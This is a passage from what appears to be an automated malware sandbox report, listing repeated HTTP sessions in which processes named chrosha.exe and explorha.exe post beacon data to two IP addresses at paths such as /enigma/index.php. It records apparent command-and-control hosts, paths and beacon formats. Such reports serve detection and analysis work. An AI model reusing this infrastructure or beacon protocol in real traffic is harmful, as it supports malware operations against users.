                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1136192.168.2.550990193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:11.966552019 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:12.215764046 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1137192.168.2.550991193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:12.071188927 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:12.319031000 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1138192.168.2.550992193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:12.567848921 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:12.826281071 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1139192.168.2.550993193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:12.573442936 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:12.828583002 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1140192.168.2.550994193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:13.079648972 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:13.330490112 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1141192.168.2.550995193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:13.181581020 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:13.428740978 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1142192.168.2.550996193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:13.681881905 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:13.931174040 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1143192.168.2.550997193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:13.695239067 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:13.946455002 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1144192.168.2.550998193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:14.202203035 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:14.456444025 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1145192.168.2.550999193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:14.292876959 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:14.543880939 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1146192.168.2.551000193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:14.795607090 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:15.046539068 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1147192.168.2.551001193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:14.823648930 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:15.071965933 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1148192.168.2.551002193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:15.323409081 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:15.573204994 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1149192.168.2.551003193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:15.396133900 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:15.640647888 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1150192.168.2.551004193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:15.888179064 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:16.135715961 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1151192.168.2.551005193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:15.931210041 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:16.179217100 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:16 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1152192.168.2.551006193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:16.431946039 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
